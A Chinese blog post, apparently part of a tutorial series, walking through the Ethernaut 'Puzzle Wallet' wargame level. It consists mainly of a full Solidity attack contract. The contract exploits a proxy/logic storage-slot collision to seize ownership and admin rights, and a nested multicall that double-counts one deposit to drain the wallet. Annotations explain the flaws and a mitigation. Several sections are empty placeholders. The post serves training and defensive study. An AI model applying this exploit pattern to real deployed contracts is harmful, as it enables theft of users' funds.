# 智能合约黑客攻击 Ethernaut: 24. Puzzle Wallet

By [Leek DEV](https://paragraph.com/@leekdev) · 2023-09-28

---

本系列是 [Leek DEV](https://twitter.com/LeekDEV) 制作的 [智能合约黑客攻击 Ethernaut](https://ethernaut.openzeppelin.com/) 讲解系列，每个关卡都配有讲解视频和 [文档](https://mirror.xyz/leekdev.eth)；更详细的讲解视频可以在 [YouTube](https://www.youtube.com/@LeekDEV) 或 [BILIBILI](https://space.bilibili.com/3493272831920239) 观看。

教程
--

*   TikTok - ….
    
*   GitHub - [攻击代码](https://github.com/6boris)
    
*   Bilibili - [视频教程](https://space.bilibili.com/3493272831920239)
    
*   YouTube - [视频教程](https://www.youtube.com/@LeekDEV)
    

题目
--

…

Hack思路
------

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;
    
    /// @notice Minimal interface covering the calls PuzzleWalletHack makes against the level instance.
    /// @dev Only signatures are declared; the target's implementation is not reproduced on this page.
    ///      NOTE(review): in the published Ethernaut level, proposeNewAdmin is implemented by the
    ///      proxy and the remaining functions by the wallet logic contract reached through
    ///      delegatecall. Confirm against the level source before relying on this.
    interface IPuzzleWallet {
        // Takes the address to propose; access control, if any, is not visible from here.
        function proposeNewAdmin(address _newAdmin) external;
        // Takes the address to whitelist; presumably restricted to the wallet owner (verify in target).
        function addToWhitelist(address addr) external;
        // Forwards `value` wei and `data` to `to`; payable.
        function execute(address to, uint256 value, bytes calldata data) external payable;
        // Payable entry point with no arguments.
        function deposit() external payable;
        // Accepts a batch of ABI-encoded calls; payable, so a single msg.value accompanies the whole batch.
        function multicall(bytes[] calldata data) external payable;
        // Takes a uint256 limit; what storage it writes is defined by the target, not by this interface.
        function setMaxBalance(uint256 _maxBalance) external;
    }
    
    /// @notice Walkthrough contract for Ethernaut level 24 (Puzzle Wallet).
    /// @dev The sequence in attack() depends on statement order: each call relies on the state
    ///      change made by the one before it. The inline comments point out the two design flaws
    ///      a reviewer should look for in any proxy/implementation pair: overlapping storage
    ///      layout, and a payable batch function that lets one msg.value be counted more than once.
    contract PuzzleWalletHack {
        // Both handles are set to the same address in the constructor; two names are kept only
        // to signal which layer (proxy vs. wallet logic) each call is aimed at.
        IPuzzleWallet public proxy;
        IPuzzleWallet public wallet;
        // Single-element batch: one ABI-encoded deposit() call.
        bytes[] depositData = [abi.encodeWithSignature("deposit()")];
        // Two-element batch: deposit() directly, plus a nested multicall that wraps depositData.
        // A single outer multicall therefore reaches deposit() twice.
        // NOTE(review): a per-call "deposit already seen" guard inside multicall does not help
        // if the guard is reset on re-entry into multicall. Confirm how the target tracks this.
        bytes[] multicallData =
            [abi.encodeWithSignature("deposit()"), abi.encodeWithSignature("multicall(bytes[])", depositData)];
    
        /// @param _target Address of the level instance; stored under both `proxy` and `wallet`.
        constructor(address _target) payable {
            proxy = IPuzzleWallet(payable(_target));
            wallet = IPuzzleWallet(address(proxy));
        }
    
        // Accepts plain ETH transfers; execute() below sends value to address(this) with empty calldata.
        receive() external payable { }
    
        /// @notice Runs the full sequence in one transaction; msg.value funds the multicall step.
        function attack() public payable {
            // Step 1: propose this contract as admin, then immediately call a wallet function.
            // NOTE(review): in the published level the proxy's pendingAdmin and the wallet's owner
            // occupy the same storage slot, so the first write is read back as `owner` by the
            // logic contract. Verify slot layout in the target. Typical mitigation: keep proxy
            // admin state in unstructured (EIP-1967 style) slots.
            proxy.proposeNewAdmin(address(this));
            wallet.addToWhitelist(address(this));
    
            // Step 2: one payment of msg.value, two deposit() paths (see multicallData).
            // Presumably the target credits msg.value on every deposit(); delegatecall keeps
            // msg.value unchanged across the nested batch, so the credited balance can exceed
            // the ETH actually sent. Verify in target.
            wallet.multicall{ value: msg.value }(multicallData);
            // Requests twice the amount sent, delivered to this contract with empty calldata.
            // NOTE(review): this only empties the instance if it held exactly msg.value
            // beforehand. Confirm the instance's starting balance.
            wallet.execute(address(this), msg.value * 2, bytes(""));
    
            // Step 3: passes the caller's address, widened to uint256, as the new max balance.
            // NOTE(review): in the published level maxBalance shares a slot with the proxy's
            // admin, so this write replaces the admin address. Verify slot layout in the target.
            wallet.setMaxBalance(uint256(uint160(msg.sender)));
        }
    }
    

Hack案例
------

…

防范思路
----

…

参考资料
----

….

---

*Originally published on [Leek DEV](https://paragraph.com/@leekdev/ethernaut-24-puzzle-wallet)*
